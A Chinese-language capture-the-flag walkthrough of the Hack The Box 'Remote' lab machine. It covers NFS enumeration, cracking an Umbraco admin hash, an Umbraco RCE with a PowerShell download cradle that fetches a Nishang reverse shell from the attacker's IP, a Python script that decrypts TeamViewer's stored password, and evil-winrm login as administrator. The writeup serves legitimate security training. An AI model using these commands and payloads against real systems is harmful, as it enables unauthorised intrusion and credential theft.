信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.180 | TCP:21, 80, 111, 135, 139, 445, 2049, 5985, 47001, 49664, 49665, 49666, 49667, 49678, 49679, 49680 |
nmap -p- 10.10.10.180 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
22975/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
63748/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Umbraco && NFS
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图](https://img.4awl.net/img/f3/b86fbbe893215034cdba9259482e1d.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图")
$ whatweb http://10.10.10.180/ -v
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图1](https://img.4awl.net/img/5a/9ad32f1afa93a530b4332c79550080.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图1")
$ showmount -e 10.10.10.180
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图2](https://img.4awl.net/img/09/bf3e5b4ab49e5a13b5602835d6d03a.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图2")
$ sudo mkdir -p /mnt/10.10.10.180
$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图3](https://img.4awl.net/img/be/0ccc50cbbdebec60407530b9b23b19.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图3")
$ strings App_Data/Umbraco.sdf | grep admin
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图4](https://img.4awl.net/img/11/6345e0cc55d4641e202706d330a44c.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图4")
username:[email protected]hash:b8be16afba8c314ad33d812f22a04991b90e2aaa
$ hashcat -m 100 b8be16afba8c314ad33d812f22a04991b90e2aaa /usr/share/wordlists/rockyou.txt --force
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图5](https://img.4awl.net/img/f8/0a152282e76c76c9bf8046c2ac1c09.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图5")
password:baconandcheese
登录
http://10.10.10.180/Umbraco#/login/false?returnPath=%252FUmbraco
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图6](https://img.4awl.net/img/3d/a2d335da98448311d29c051252363f.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图6")
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图7](https://img.4awl.net/img/05/8c782b313c2bd950a1c3a862c2043f.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图7")
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图8](https://img.4awl.net/img/55/8889880be2cebb45425cc52aea9c97.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图8")
https://www.exploit-db.com/exploits/46153
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图9](https://img.4awl.net/img/87/ab3fcca96fe26f6eaa2daee9942f0e.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图9")
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图10](https://img.4awl.net/img/13/6e97af5c52892663dfb1d2403edc49.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图10")
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图11](https://img.4awl.net/img/0e/8445e0e3ce5275c4333ccdaf832e67.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图11")
反向shell
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032">>Invoke-PowerShellTcp.ps1
将powershell脚本上传目标
string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring(\'http://10.10.16.24/Invoke-PowerShellTcp.ps1')";
$ python exp.py
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图12](https://img.4awl.net/img/97/b861e3be64ec9eb0ff739b90355eda.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图12")
User.txt
c9b78c488c6ae1828b13d050b156d542
权限提升
TeamViewer应用程序
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图13](https://img.4awl.net/img/ab/c446705c6b488ab8b1a7b29c91d679.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图13")
在msf的插件中提及到Version7的注册表路径是HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图14](https://img.4awl.net/img/5c/c7b9683792915564ca5e5bb44fc8d2.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图14")
PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图15](https://img.4awl.net/img/74/5269edeef3fe9298a8795315fabec9.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图15")
PS HKLM:\software\wow6432node\teamviewer\version7> (Get-ItemProperty -Path .).SecurityPasswordAES -join ", " | ForEach-Object { "[" + $_ + "]" }
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图16](https://img.4awl.net/img/62/350acac5fa6a4c6a1f49158c8c9883.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图16")
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图17](https://img.4awl.net/img/ec/8fcf1d96b57189e69e472b30e0d360.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图17")
#!/usr/bin/env python3
from Crypto.Cipher import AES
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
126, 141, 55, 107, 38, 57, 78, 91])
aes = AES.new(key, AES.MODE_CBC, IV=iv)
password = aes.decrypt(ciphertext).decode("utf-16").rstrip("\x00")
print(f"[+] Found password: {password}")
$ python dec.py
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图18](https://img.4awl.net/img/75/90ae399121a990ea98575c87890145.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图18")
$ crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图19](https://img.4awl.net/img/f6/e6bfabbd9749492c3299d585c5d043.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图19")
$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
![[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图20](https://img.4awl.net/img/80/51fbaa5983864c88b22e8b8f4a4f1a.jpg "[Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…插图20")
Root.txt
858343dff7922d618a28508565307822
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
